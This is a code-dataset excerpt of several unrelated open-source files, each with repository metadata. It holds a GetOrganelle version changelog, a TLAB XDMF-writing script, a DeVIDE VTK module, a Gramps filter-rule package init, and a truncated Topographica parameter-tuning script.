"3. open() modified",
]},
{"number": "1.6.2a",
"features": [
"1. the bug with option \"--genes\" fixed",
"2. the bug with \"Mixing iteration and read methods\" introduced by 1.6.2 fixed",
]},
{"number": "1.6.2",
"features": [
"1. get_organelle_from_reads.py: --reduce-reads-for-cov/estimate_maximum_n_reads_using_mapping() added; "
" problem with pre_assembly_mapped_reads_for_base_cov() fixed; "
" better target-hitting base coverage estimation",
"2. get_organelle_from_assembly.py: fix a bug on parsing gfa file with long seq head names; "
" --keep-temp fixed; fix a bug with '-h'; ",
"3. Utilities/slim_fastg.py: --no-merge -> --merge; disable merge by default",
"4. GetOrganelleLib/assembly_parser.py: fix a bug with generating new vertices, "
" as well as merge_all_possible_contigs; export plastome-LSC direction according to convention based on "
" accumulated orf lengths (the conventional reverse direction has more accumulated orf lengths), which "
" makes users easier to use; remove processing_polymorphism() before filter_by_coverage() to better "
" cluster organelle contigs by coverages",
"5. blastn GLIBC_2.14 not found problem fixed",
"6. '-F embplant_pt' does not remove embplant_mt-hitting contigs, which makes more accurate clustering",
]},
{"number": "1.6.1a",
"features": [
"1. GetOrganelleLib/SeedDatabase: embplant_pt updated. ",
]},
{"number": "1.6.1",
"features": [
"1. GetOrganelleLib/SeedDatabase: updated with repeats removed. "
" save computational time and generate better target-hitting base coverage estimation.",
]},
{"number": "1.6.0",
"features": [
"1. setup.py added with new installation way.",
"2. GetOrganelleDep added for easier dependencies installation",
"3. get_organelle_reads.py -> get_organelle_from_reads.py;"
" --max-extending-len, --ex-genes, --which-blast, --which-bowtie2, --which-spades, --zip-files added; "
"multi-organelle mode supported; add support for fq head @digits; "
"--safe,-r,--auto-wss,--soft-max-n-words etc removed; --flush-step modified (background mode); "
"4. get_organelle_from_assembly.py (basically slim + disentangle) added",
"5. Library/SeqReference -> GetOrganelleLib/SeedDatabase",
"6. Library/NotationReference -> GetOrganelleLib/LabelDatabase",
"7. plant_mt -> embplant_mt; plant_nr -> embplant_nr; plant_pt -> embplant_pt; other_pt added;",
"8. assembly_parser.py: keep terminal contigs if --linear; fix a bug when --acyclic-allowed; "
"optimized for self-loop contigs",
"9. Utilities/evaluate_assembly_using_mapping.py: log statistics without --draw",
"10. Utilities/disentangle_organelle_assembly.py: --acyclic-allowed -> --linear",
"11. Utilities/slim_fastg.py: --no-merge added",
]},
{"number": "1.5.2a",
"features": [
"1. more descriptive log",
]},
{"number": "1.5.2",
"features": [
"1. get_organelle_reads.py: Bowtie2 index files written to sample output directory rather than "
" to GetOrganelle/Library/SeqReference",
"2. get_organelle_reads.py: more descriptive log",
"3. seq_parser.py: re_linear_circular_seqs: fix a bug for evaluating the assembly result of DR plastomes",
"4. evaluate_assembly_using_mapping.py: bowtie2-build --seed",
]},
{"number": "1.5.1c",
"features": [
"1. --random-seed added with default value 12345",
"2. wider suggested/default k-mer values",
"3. get_organelle_reads.py: exit after illegal -F",
"4. evaluate_assembly_using_mapping.py: customized error rate info added",
"5. evaluate_assembly_using_mapping.py: robust to illegitimate usage of duplicated seq names in fasta",
"6. evaluate_assembly_using_mapping.py: fix a bug when no aligned bases found",
"7. sam_parser.py: keep redundant cigar chars",
"8. README.md: toolkit",
"9. evaluate_assembly_using_mapping.py: re-linearize circular sequence before mapping",
"10. plastome_arch_info.py: added",
]},
{"number": "1.5.1b",
"features": [
"1. get_organelle_reads.py: value of mesh size should have effect on --out-per-round (fix a bug since 1.4.2)",
]},
{"number": "1.5.1a",
"features": [
"1. get_organelle_reads.py: from math import inf is not compatible with Python2; -R default set to 1000",
"2. pipe_control_func.py: MEM_TRANS, influence summary_get_organelle_output.py",
]},
{"number": "1.5.1",
"features": [
"1. fix a bug in get_organelle_reads.py: pre_grouping(): generate_forward_and_reverse()",
"2. fix a bug in evaluate_assembly_using_mapping.py: --debug",
]},
{"number": "1.5.0h",
"features": [
"1. re-organize importing codes",
"2. minimum of -R: 2 -> 1",
"3. slim_fastg.py: remove default -F",
"4. round_statistics.py: increase significant digits",
]},
{"number": "1.5.0g",
"features": [
"1.get_organelle_reads.py: fix a bug in --out-per-round & --min-quality-score, chop_seqs -> chop_seq_list",
"2.get_organelle_reads.py: expand user-defined word size scope, 49 -> 29 (AUTO_MIN_WS, GLOBAL_MIN_WS)",
"3.README.md: updated",
]},
{"number": "1.5.0f",
"features": [
"1.disentangle: more instructive log.",
"2.Set default logging level of round_statistics.py and evaluate_assembly_using_mapping.py to INFO",
"3.round_statistics.py: set larger value to max_cov_tick",
]},
{"number": "1.5.0e",
"features": [
"1.get_organelle_reads.py: --continue skip disentangling when *.gfa & *.fasta",
]},
{"number": "1.5.0d",
"features": [
"1.disentangle: parallel contigs remained; --contamination-depth",
"2.seq_parser.py: find_string_dif adjusted",
]},
{"number": "1.5.0c",
"features": [
"1.evaluate_assembly_using_mapping.py & sam_parser.py: mapped reads counted; echo bug correctly",
]},
{"number": "1.5.0b",
"features": [
"1.evaluate_assembly_using_mapping.py: --debug added",
"2.slim_fastg.py: compatible with older python version"
]},
{"number": "1.5.0a",
"features": [
"1.evaluate_assembly_using_mapping.py: modifying the layout; plot options added",
]},
{"number": "1.5.0",
"features": [
"1.evaluate_assembly_using_mapping.py added",
]},
{"number": "1.5.0-pre2",
"features": [
"-F anonym added",
"-F fungus_mt added",
"-F animal_mt added but not activated",
"re-estimate base coverage by counting seed word frequencies if the result (directly from sam) < 200",
"fix a bug for logging base-coverage when no kmer detected from graph",
"fix a bug of --continue",
]},
{"number": "1.5.0-pre",
"features": [
"cp -> plant_pt; mt -> plant_mt; nr -> plant_nr; for adding animals",
"Comparison url (https://github.com/Kinggerm/GetOrganelleComparison) added",
]},
{"number": "1.4.4b",
"features": [
"1.assembly_parser.py: fix a bug for disentangling single-contig graph; remove redundant 'repeat_pattern';",
]},
{"number": "1.4.4a",
"features": [
"time limit works only for disentangling graph as a circular genome",
"more informative log info for disentangling",
]},
{"number": "1.4.4",
"features": [
"1.get_organelle_reads.py: fix a bug with --continue & --prefix when LogInfo() added; ",
"2.assembly_parser.py & statistical_func.py: "
"if single copy vertex percentage is < 50%, continue dropping suspicious vertices",
"3.pip_control_func.py: for --prefix",
]},
{"number": "1.4.3a",
"features": [
"1.get_organelle_reads.py: check_kmers() modified; ",
"2.pipe_control_func.py: LogInfo() modified",
]},
{"number": "1.4.3",
"features": [
"1.get_organelle_reads.py: output renamed; fix a bug of logging",
"2.summary_get_organelle_output.py: added",
]},
{"number": "1.4.3-beta",
"features": [
"1.get_organelle_reads.py: a bug in logging seed reads; moving re-setting kmers after extending;",
"2.disentangle_organelle_assembly.py & assembly_parser.py: "
"2a.'--acyclic-allowed' activated; "
"2b.'--continue' added; "
"2c.better output for polymorphyism-contained graph, default degenerate similarity threshold increased, "
" print warning when degenerate base used; "
"2d.find_target_graph(broken_graph_allowed)",
"4.pip_control_func.py: LogInfo added",
"5.NotationReference: cp updated"
]},
{"number": "1.4.2",
"features": [
"1.get_organelle_reads.py: better seed fastq file log; "
" increase the default values of jump_step and mesh_size",
"2.assembly_parser.py: fix a bug in filter_by_coverage().",
"3.disentangle_organelle_assembly.py: '--acyclic-allowed' added (not activated yet)",
"4.statistical_func.py: fix a bug in assign_cluster_labels",
"5.join_spades_fastg_by_blast.py: signs of gap and overlap",
"6.SeqReference/cp.fasta: source id specified",
]},
{"number": "1.4.1a",
"features": [
"1.get_organelle_reads.py: '--no-pre-reading' added",
]},
{"number": "1.4.1",
"features": [
"1.assembly_parser.py: Assembly.export_path() and Assembly.merge_all_possible_vertices():"
" name of merged vertices optimized",
"2.README: PATH configuration",
"3.mk_batch_for_iteratively_mapping_assembling.py: -t threads",
"4.get_organelle_reads.py --fast mode modified",
"5.sam_parser.py added: for 1.5.0",
]},
{"number": "1.4.0j",
"features": [
"1.default values (--max-n-words & --auto-wss) set to make GetOrganelle perform like older versions",
]},
{"number": "1.4.0i",
"features": [
"1.empirically reduce maximum word size",
"2.report SPAdes failed when not output folder exist.",
]},
{"number": "1.4.0h",
"features": [
"1.fix a bug: calling slim_fastg.py failed.",
]},
{"number": "1.4.0g",
"features": [
"1.slim_fastg.py: fix the import error when using python2.*",
"2.README.md: in case of HTTP request failed",
]},
{"number": "1.4.0f",
"features": [
"1.parse_gfa() added to Library/assembly_parser.py",
"2.get_organelle_reads.py -h",
]},
{"number": "1.4.0e",
"features": [
"1.print python version",
"2.gfa2fastg.py modified, gfa2fasta.py added, fastg2gfa.py added",
]},
{"number": "1.4.0d",
"features": [
"1.some default values adjusted.",
"2.slim_fastg.py: '--depth-threshold' -> '--min-depth'&'--max-depth'",
"3.print python version"
"4.gfa2fastg.py modified, gfa2fasta.py added, fastg2gfa.py added"
]},
{"number": "1.4.0c",
"features": [
"1.'--pre-w' added mainly for reproducing results when word size changes during reads extending process.",
]},
{"number": "1.4.0b",
"features": [
"1.--max-reads also works for mapping now, which would do better in target coverage estimation.",
]},
{"number": "1.4.0a",
"features": [
"1.default reference seq set as Library/SeqReference/*.fasta.",
]},
{"number": "1.4.0",
"features": [
"1.estimate_word_size() added.",
"2.auto_word_size_step (--auto-wss, --soft-max-words, -r) added.",
"3.mean_error_rate added.",
"4.options re-organized and introductions optimized: '-h' versus '--help'.",
"5.Utilities/mk_get_organelle.py recognize *.gz files.",
"6.change the default setting of --max-n-words"
]},
{"number": "1.3.1",
"features": [
"1.'--max-discard-percent' added to prevent discarding too much data.",
"2.fix the bug in get_low_quality_char_pattern, which causes misidentification for quality encoding format.",
"3.--flush-frequency added",
"4.better log info",
"5.'--overwrite' -> '--no-overwrite' in slim_fastg.py"
]},
{"number": "1.3.0d",
"features": [
"1.continue to process assembly results based on available kmers if SPAdes failed at one of the planned kmers",
]},
{"number": "1.3.0c",
"features": [
"1.fix a bug: compatibility with '--continue' option of SPAdes",
]},
{"number": "1.3.0b",
"features": [
"1.fix a bug for exporting organelle",
]},
{"number": "1.3.0a",
"features": [
"1.automatically discard improper input kmers",
]},
{"number": "1.3.0",
"features": [
"1.Read quality control (--min-quality-score) added.",
"2.--trim option removed.",
"3.fix a bug on word size estimation",
]},
{"number": "1.2.0d",
"features": [
"1.Add --max-words.",
]},
{"number": "1.2.0c",
"features": [
"1.Go over assemblies based on all kmer values, from large to small, until the solvable assembly is found.",
"2.overwrite option added for slim_fastg.py",
"3.Optimize the log",
"4.multiprocessing function added (planed, not utilized yet)",
]},
{"number": "1.2.0b",
"features": [
"1.Assembly.parse_fastg(): (more robust) Add connection information to both of the related vertices"
" even it is only mentioned once;",
"2.Assembly.is_sequential_repeat(): fix a bug that leak in the reverse direction;",
"3.add depth_factor to the main script;",
"4.remove unnecessary warning when #read equals maximum#reads setting, show warning only when overrunning;",
]},
{"number": "1.2.0a",
"features": [
"1.set time limit for disentangling",
]},
{"number": "1.2.0",
"features": [
"1.more robust and precise in disentangling graph: ",
"2.report contamination; ",
"3.detect parallel contigs and generate consensus;",
"4.estimate chloroplast coverage distribution pattern using weighted GMM with EM and BIC;",
"5.re-organize codes",
"6.update NotationReference",
]},
{"number": "1.1.0d",
"features": [
"1.more precise in disentangling graph.",
"2.--prefix added",
]},
{"number": "1.1.0c",
"features": [
"1.--max-reads: default=10,000,000 for cp and nr, default=50,000,000 for mt",
]},
{"number": "1.1.0b",
"features": [
"1.'-w' could be followed with a ratio of word_size to average_read_length now",
]},
{"number": "1.1.0a",
"features": [
"1.Add options-maximum_number_of_reads with default=10,000,000 to avoid unnecessary overloading",
]},
{"number": "1.1.0",
"features": [
"1.automatically exporting final sequence(s)",
"2.adding disentangle_organelle_assembly.py",
"3.adding assembly_parser.py",
"4.re-organize codes",
"5.revise README.md",
]},
{"number": "1.0.5",
"features": [
"1.re-organize codes",
]},
{"number": "1.0.4",
"features": [
"1.support fq head with @XXXX.XXXX.X",
"2.automatically skip empty fq files for spades",
]},
{"number": "1.0.3a",
"features": [
"1.gunzip",
]},
{"number": "1.0.3",
"features": [
"1.accept .gz/.zip files as input",
"2.logging errors as utf8",
]},
{"number": "1.0.2a",
"features": [
"1.prompt failure in Utilities/slim_fastg.py",
]},
{"number": "1.0.2",
"features": [
"1.removing duplicates become a parameter to control the memory usage.",
]},
{"number": "1.0.1a",
"features": [
"1.Fix the bug of running spades.py with --continue when no output file exists.",
]},
{"number": "1.0.1",
"features": [
"1.Add default reference (Library/SeqReference).",
]}
]
| Kinggerm/GetOrganelle | GetOrganelleLib/versions.py | Python | gpl-3.0 | 31,892 | [
"BLAST"
] | 93f859fb4d5191267d79c9baec1852b5ab55c681829c791244a104daf8f8dc3b |
#!/usr/bin/python3
import numpy as np # For array operations.
import sys
nx = 0 # number of points in Ox; if 0, then search dns.ini
ny = 0 # number of points in Oy; if 0, then search dns.ini
nz = 0 # number of points in Oz; if 0, then search dns.ini
sizeofmask = 6
# do not edit below this line
# getting grid size from dns.ini, if necessary
if ( nx == 0 ):
for line in open('dns.ini'):
if line.lower().replace(" ","").startswith("imax="):
nx = int(line.split("=",1)[1])
break
if ( ny == 0 ):
for line in open('dns.ini'):
if line.lower().replace(" ","").startswith("jmax="):
ny = int(line.split("=",1)[1])
break
if ( nz == 0 ):
for line in open('dns.ini'):
if line.lower().replace(" ","").startswith("kmax="):
nz = int(line.split("=",1)[1])
break
print("Grid size is {}x{}x{}.".format(nx,ny,nz))
def itnumber(filename):
main = filename.split(".",1)[0]
return int(main[len(main)-sizeofmask:len(main)])
if ( len(sys.argv) == 1 ):
print("Usage: python $0 list-of-files.")
quit()
filenames = sorted(sys.argv[1:],key=itnumber)
filetypes = []
for name in filenames:
main = name.split(".",1)[0]
type = main[:len(main)-sizeofmask]
if not (any(type in s for s in filetypes)):
filetypes.append(type)
filetimes = []
for name in filenames:
main = name.split(".",1)[0]
time = main[len(main)-sizeofmask:len(main)]
if not (any(time in s for s in filetimes)):
filetimes.append(time)
print("Processing %d times in fields %s..." % ( len(filetimes) , ', '.join(filetypes) ))
f = open('main'+'.times.xdmf', 'w')
# Definining entities depending on planesmode
f.write('''<?xml version="1.0" ?>
<!--
XDMF file to read time collections of plane data from TLAB into a data analysis and visualization application, like ParaView.
Add simply data items after the geometry block to read different files.
The structure of this file has been adapted from psOpen, from Jens Henrik Goebbert.
-->
<!DOCTYPE Xdmf SYSTEM "Xdmf.dtd" [
''')
data = ( nx,ny,nz, nx,ny,nz )
f.write('''
<!-- dimension of complete datasets -->
<!ENTITY DimsX "%d">
<!ENTITY DimsY "%d">
<!ENTITY DimsZ "%d">
<!-- dimension of hyperslab to load -->
<!ENTITY HSDimsX "%d">
<!ENTITY HSDimsY "%d">
<!ENTITY HSDimsZ "%d">
<!-- start of hyperslab in complete dataset -->
<!ENTITY HSDimsX_Start "0">
<!ENTITY HSDimsY_Start "0">
<!ENTITY HSDimsZ_Start "0">
<!-- stride of hyperslab in complete dataset -->
<!ENTITY HSStrideX "1">
<!ENTITY HSStrideY "1">
<!ENTITY HSStrideZ "1">
<!-- data precision (grid is always 8 bytes) -->
<!ENTITY Prec "4">
''' % data )
data = (56+nx*8+8, 56+nx*8+8+ny*8+8)
f.write('''
<!-- offsets to grid blocks -->
<!ENTITY SeekGridX "56">
<!ENTITY SeekGridY "%d"> <!-- + DimX*8 + 8-->
<!ENTITY SeekGridZ "%d"> <!-- + DimY*8 + 8-->
<!-- offsets to data -->
<!ENTITY SeekData "0"> <!-- No header -->
<!-- <!ENTITY SeekData "52"> --> <!-- Tlab header -->
<!-- <!ENTITY SeekData "244"> --> <!-- Ensight header -->
''' % data )
# code below is independent of filetype
f.write('''
]>
<Xdmf xmlns:xi="http://www.w3.org/2001/XInclude" Version="2.0">
<Domain Name="main">
<!-- Hyperslab metadata referenced below -->
<DataItem Name="HSMetaData" Dimensions="3 3" Format="XML">
&HSDimsZ_Start; &HSDimsY_Start; &HSDimsX_Start;
&HSStrideZ; &HSStrideY; &HSStrideX;
&HSDimsZ; &HSDimsY; &HSDimsX;
</DataItem>
<!-- Defining common topology and common grid to all timeslices -->
<Topology TopologyType="3DRectMesh" Dimensions="&HSDimsZ; &HSDimsY; &HSDimsX;">
</Topology>
<Geometry GeometryType="VXVYVZ">
<DataItem Name="X" ItemType="HyperSlab" Dimensions="&HSDimsX;">
<DataItem Dimensions="1 3" Format="XML">
&HSDimsX_Start;
&HSStrideX;
&HSDimsX;
</DataItem>
<DataItem ItemType="Uniform" Format="Binary" Seek="&SeekGridX;" NumberType="Float" Precision="8" Endian="Little" Dimensions="&DimsX;">
grid
</DataItem>
</DataItem>
<DataItem Name="Y" ItemType="HyperSlab" Dimensions="&HSDimsY;">
<DataItem Dimensions="1 3" Format="XML">
&HSDimsY_Start;
&HSStrideY;
&HSDimsY;
</DataItem>
<DataItem ItemType="Uniform" Format="Binary" Seek="&SeekGridY;" NumberType="Float" Precision="8" Endian="Little" Dimensions="&DimsY;">
grid
</DataItem>
</DataItem>
<DataItem Name="Z" ItemType="HyperSlab" Dimensions="&HSDimsZ;">
<DataItem Dimensions="1 3" Format="XML">
&HSDimsZ_Start;
&HSStrideZ;
&HSDimsZ;
</DataItem>
<DataItem ItemType="Uniform" Format="Binary" Seek="&SeekGridZ;" NumberType="Float" Precision="8" Endian="Little" Dimensions="&DimsZ;">
grid
</DataItem>
</DataItem>
</Geometry>
<!-- Collection of timeslices -->
<Grid GridType="Collection" CollectionType="Temporal">
<Time TimeType="HyperSlab">
<DataItem Format="XML" NumberType="Float" Dimensions="3"> <!-- start, stride, count-->
0.0 1.0 %d;
</DataItem>
</Time>
''' % (len(filetimes)) )
# Loop over timeslices
for time in filetimes:
f.write('''
<!-- Timeslice -->
<Grid Name="It%d" GridType="Uniform">
<Topology Reference="/Xdmf/Domain/Topology[1]"/>
<Geometry Reference="/Xdmf/Domain/Geometry[1]"/>
''' % (int(time)) )
for type in filetypes:
if ( type in ['VelocityVector','VorticityVector'] ):
f.write('''
<Attribute AttributeType="Vector" Name="%s">
<DataItem ItemType="Function" Function="JOIN($0,$1,$2)" Dimensions="&HSDimsZ; &HSDimsY; &HSDimsX; 3">
<DataItem ItemType="HyperSlab" Dimensions="&HSDimsZ; &HSDimsY; &HSDimsX;">
<DataItem Reference="/Xdmf/Domain/DataItem[1]"/>
<DataItem ItemType="Uniform" Format="Binary" Seek="&SeekData;" NumberType="Float" Precision="4" Endian="Little" Dimensions="&DimsZ; &DimsY; &DimsX;">
%s
</DataItem>
</DataItem>
<DataItem ItemType="HyperSlab" Dimensions="&HSDimsZ; &HSDimsY; &HSDimsX;">
<DataItem Reference="/Xdmf/Domain/DataItem[1]"/>
<DataItem ItemType="Uniform" Format="Binary" Seek="&SeekData;" NumberType="Float" Precision="4" Endian="Little" Dimensions="&DimsZ; &DimsY; &DimsX;">
%s
</DataItem>
</DataItem>
<DataItem ItemType="HyperSlab" Dimensions="&HSDimsZ; &HSDimsY; &HSDimsX;">
<DataItem Reference="/Xdmf/Domain/DataItem[1]"/>
<DataItem ItemType="Uniform" Format="Binary" Seek="&SeekData;" NumberType="Float" Precision="4" Endian="Little" Dimensions="&DimsZ; &DimsY; &DimsX;">
%s
</DataItem>
</DataItem>
</DataItem>
</Attribute>
''' % (type, type+time+'.1',type+time+'.2',type+time+'.3') )
elif ( type in ['StrainTensor','ReynoldsTensor'] ):
f.write('''
<Attribute AttributeType="Tensor6" Name="%s">
<DataItem ItemType="Function" Function="JOIN($0,$1,$2,$3,$4,$5)" Dimensions="&HSDimsZ; &HSDimsY; &HSDimsX; 6">
<DataItem ItemType="HyperSlab" Dimensions="&HSDimsZ; &HSDimsY; &HSDimsX;">
<DataItem Reference="/Xdmf/Domain/DataItem[1]"/>
<DataItem ItemType="Uniform" Format="Binary" Seek="&SeekData;" NumberType="Float" Precision="4" Endian="Little" Dimensions="&DimsZ; &DimsY; &DimsX;">
%s
</DataItem>
</DataItem>
<DataItem ItemType="HyperSlab" Dimensions="&HSDimsZ; &HSDimsY; &HSDimsX;">
<DataItem Reference="/Xdmf/Domain/DataItem[1]"/>
<DataItem ItemType="Uniform" Format="Binary" Seek="&SeekData;" NumberType="Float" Precision="4" Endian="Little" Dimensions="&DimsZ; &DimsY; &DimsX;">
%s
</DataItem>
</DataItem>
<DataItem ItemType="HyperSlab" Dimensions="&HSDimsZ; &HSDimsY; &HSDimsX;">
<DataItem Reference="/Xdmf/Domain/DataItem[1]"/>
<DataItem ItemType="Uniform" Format="Binary" Seek="&SeekData;" NumberType="Float" Precision="4" Endian="Little" Dimensions="&DimsZ; &DimsY; &DimsX;">
%s
</DataItem>
</DataItem>
<DataItem ItemType="HyperSlab" Dimensions="&HSDimsZ; &HSDimsY; &HSDimsX;">
<DataItem Reference="/Xdmf/Domain/DataItem[1]"/>
<DataItem ItemType="Uniform" Format="Binary" Seek="&SeekData;" NumberType="Float" Precision="4" Endian="Little" Dimensions="&DimsZ; &DimsY; &DimsX;">
%s
</DataItem>
</DataItem>
<DataItem ItemType="HyperSlab" Dimensions="&HSDimsZ; &HSDimsY; &HSDimsX;">
<DataItem Reference="/Xdmf/Domain/DataItem[1]"/>
<DataItem ItemType="Uniform" Format="Binary" Seek="&SeekData;" NumberType="Float" Precision="4" Endian="Little" Dimensions="&DimsZ; &DimsY; &DimsX;">
%s
</DataItem>
</DataItem>
<DataItem ItemType="HyperSlab" Dimensions="&HSDimsZ; &HSDimsY; &HSDimsX;">
<DataItem Reference="/Xdmf/Domain/DataItem[1]"/>
<DataItem ItemType="Uniform" Format="Binary" Seek="&SeekData;" NumberType="Float" Precision="4" Endian="Little" Dimensions="&DimsZ; &DimsY; &DimsX;">
%s
</DataItem>
</DataItem>
</DataItem>
</Attribute>
''' % (type, type+time+'.1',type+time+'.4',type+time+'.5', type+time+'.2',type+time+'.6',type+time+'.3') )
else:
f.write('''
<Attribute Center="Node" Name="%s">
<DataItem ItemType="HyperSlab" Dimensions="&HSDimsZ; &HSDimsY; &HSDimsX;">
<DataItem Reference="/Xdmf/Domain/DataItem[1]"/>
<DataItem ItemType="Uniform" Format="Binary" Seek="&SeekData;" NumberType="Float" Precision="&Prec;" Endian="Little" Dimensions="&DimsZ; &DimsY; &DimsX;">
%s
</DataItem>
</DataItem>
</Attribute>
''' % (type,type+time) )
f.write('''
</Grid>
''' )
# End the xmf file
f.write('''
</Grid> <!-- End of time collection -->
</Domain>
</Xdmf>
''')
f.close()
| zrick/tlab | scripts/python/xdmf.py | Python | gpl-3.0 | 9,712 | [
"ParaView"
] | 0a8a91d2b5f11be4e296a10dd041cbec3e2d6c0fa365b736c22086c6129d9818 |
# class generated by DeVIDE::createDeVIDEModuleFromVTKObject
from module_kits.vtk_kit.mixins import SimpleVTKClassModuleBase
import vtk
class vtkStreamPoints(SimpleVTKClassModuleBase):
def __init__(self, module_manager):
SimpleVTKClassModuleBase.__init__(
self, module_manager,
vtk.vtkStreamPoints(), 'Processing.',
('vtkDataSet', 'vtkDataSet'), ('vtkPolyData',),
replaceDoc=True,
inputFunctions=None, outputFunctions=None)
| nagyistoce/devide | modules/vtk_basic/vtkStreamPoints.py | Python | bsd-3-clause | 497 | [
"VTK"
] | 795e630317ede4a8f8259c245d546e6a68c9687a7da880fec83846ae27ec0ae8 |
#
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2002-2007 Donald N. Allingham
# Copyright (C) 2007-2008 Brian G. Matherly
# Copyright (C) 2011 Tim G L Lyons
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
"""
Package providing filter rules for GRAMPS.
"""
from ._searchfathername import SearchFatherName
from ._searchmothername import SearchMotherName
from ._searchchildname import SearchChildName
from ._regexpfathername import RegExpFatherName
from ._regexpmothername import RegExpMotherName
from ._regexpchildname import RegExpChildName
from ._hasreltype import HasRelType
from ._allfamilies import AllFamilies
from ._hasgallery import HasGallery
from ._hasidof import HasIdOf
from ._haslds import HasLDS
from ._regexpidof import RegExpIdOf
from ._hasnote import HasNote
from ._hasnoteregexp import HasNoteRegexp
from ._hasnotematchingsubstringof import HasNoteMatchingSubstringOf
from ._hassourcecount import HasSourceCount
from ._hassourceof import HasSourceOf
from ._hasreferencecountof import HasReferenceCountOf
from ._hascitation import HasCitation
from ._familyprivate import FamilyPrivate
from ._hasattribute import HasAttribute
from ._hasevent import HasEvent
from ._isbookmarked import IsBookmarked
from ._matchesfilter import MatchesFilter
from ._matchessourceconfidence import MatchesSourceConfidence
from ._fatherhasnameof import FatherHasNameOf
from ._fatherhasidof import FatherHasIdOf
from ._motherhasnameof import MotherHasNameOf
from ._motherhasidof import MotherHasIdOf
from ._childhasnameof import ChildHasNameOf
from ._childhasidof import ChildHasIdOf
from ._changedsince import ChangedSince
from ._hastag import HasTag
from ._hastwins import HasTwins
from ._isancestorof import IsAncestorOf
from ._isdescendantof import IsDescendantOf
editor_rule_list = [
AllFamilies,
HasRelType,
HasGallery,
HasIdOf,
HasLDS,
HasNote,
RegExpIdOf,
HasNoteRegexp,
HasReferenceCountOf,
HasSourceCount,
HasSourceOf,
HasCitation,
FamilyPrivate,
HasEvent,
HasAttribute,
IsBookmarked,
MatchesFilter,
MatchesSourceConfidence,
FatherHasNameOf,
FatherHasIdOf,
MotherHasNameOf,
MotherHasIdOf,
ChildHasNameOf,
ChildHasIdOf,
ChangedSince,
HasTag,
HasTwins,
IsAncestorOf,
IsDescendantOf,
]
| beernarrd/gramps | gramps/gen/filters/rules/family/__init__.py | Python | gpl-2.0 | 2,993 | [
"Brian"
] | f9c8cb1af93c6b8cdf4399af5389be62a5bc2385dbab7ec961eccb0b813e1aaf |
import param
import topo.pattern
import topo.pattern.random
import __main__
import os
import contrib
import topo
from topo.transferfn.misc import PatternCombine
from topo.transferfn.misc import HalfRectify
from topo import numbergen
from topo.pattern import Gaussian
from topo.numbergen import UniformRandom, BoundedNumber, ExponentialDecay
from topo.command import pattern_present
from param import normalize_path
import numpy
from contrib.jacommands import LateralOrientationAnnisotropy
from topo.analysis.featureresponses import MeasureResponseCommand, FeatureMaps, SinusoidalMeasureResponseCommand, FeatureCurveCommand
FeatureMaps.num_orientation=16
MeasureResponseCommand.scale=1.0
MeasureResponseCommand.duration=4.0
SinusoidalMeasureResponseCommand.frequencies=[2.4]
FeatureCurveCommand.num_orientation=16
FeatureCurveCommand.curve_parameters=[{"contrast":15},{"contrast":50},{"contrast":90}]
from topo.command import load_snapshot
#load_snapshot('./DATA/LESI/TEST-small/CCSimple_000002.00.typ')
#load_snapshot('./DATA/LESI/TEST/CCSimple_000002.00.typ')
load_snapshot('./DATA/LESI/CCLESIGifLatest/CCSimple_010000.00.typ')
#load_snapshot('./DATA/LESI/CCLESIGif-NEW1/CCSimple_010000.00_with_map.typ')
#load_snapshot('./DATA/LESI/CCLESIGif12-Orig-LARGE_NEWEXPANDER5000/CCSimple_005002.00.typ')
from topo.command import wipe_out_activity, clear_event_queue
wipe_out_activity()
clear_event_queue()
from topo.pattern import SineGrating, Disk
class SineGratingDiskTemp(SineGrating):
mask_shape = param.Parameter(default=Disk(smoothing=0,size=1.0))
def new_set_parameters(a,b,c,d,e,f,g):
print a,b,c,d,e,f,g
topo.sim["LGNOn"].projections()["LateralGC"].strength=a
topo.sim["LGNOff"].projections()["LateralGC"].strength=a
def _divide_with_constant(x, y):
y = numpy.clip(y, 0, 10000)
x = numpy.clip(x, 0, 10000)
return numpy.divide(x, y + b)
topo.sim["LGNOn"].projections()["LateralGC"].activity_group = (0.6,_divide_with_constant)
topo.sim["V1Complex"].output_fns[1].t*=0
topo.sim["V1Complex"].output_fns[1].t+=c
topo.sim["V1ComplexInh"].output_fns[1].t*=0
topo.sim["V1ComplexInh"].output_fns[1].t+=d
topo.sim["V1ComplexInh"].output_fns[1].gain=e
topo.sim["V1ComplexInh"].projections()["LongEI"].strength=f
topo.sim["V1ComplexInh"].projections()["LocalEI"].strength=g
par = "_" + str(a)+ "_" + str(b) + "_" + str(c) + "_" + str(d)+ "_" + str(e) + "_" + str(f)+ "_" + str(g) + ".png"
plot_size_tuning(par)
def set_parameters(a,b,c,d,e,f,g,h,i,j,k,l,m):
print a,b,c,d,e,f,g,h,i,j,k,l,m
topo.sim["V1Simple"].projections()["V1SimpleFeedbackExc1"].strength=b
topo.sim["V1Simple"].projections()["V1SimpleFeedbackInh"].strength=c
topo.sim["V1Complex"].projections()["LongEE"].strength=d
topo.sim["V1ComplexInh"].projections()["LongEI"].strength=e
topo.sim["V1Complex"].projections()["LocalIE"].strength=f
topo.sim["V1ComplexInh"].projections()["LocalII"].strength=g
topo.sim["V1Complex"].projections()["V1SimpleAfferent"].strength=h
topo.sim["V1Complex"].projections()["LocalEE"].strength=i
topo.sim["V1ComplexInh"].projections()["LocalEI"].strength=j
topo.sim["V1Complex"].output_fns[1].t*=0
topo.sim["V1Complex"].output_fns[1].t+=k
topo.sim["V1ComplexInh"].output_fns[1].t*=0
topo.sim["V1ComplexInh"].output_fns[1].t+=l
topo.sim["V1ComplexInh"].output_fns[1].gain=m
def check_activity(a,b,c,d,e,f,g,h,i,j,k,l,m):
print a,b,c,d,e,f,g,h,i,j,k,l,m
#topo.sim["V1Simple"].projections()["V1SimpleFeedbackExc1"].strength=b
#topo.sim["V1Simple"].projections()["V1SimpleFeedbackInh"].strength=c
#topo.sim["V1Complex"].projections()["LongEE"].strength=d
#topo.sim["V1ComplexInh"].projections()["LongEI"].strength=e
#topo.sim["V1Complex"].projections()["LocalIE"].strength=f
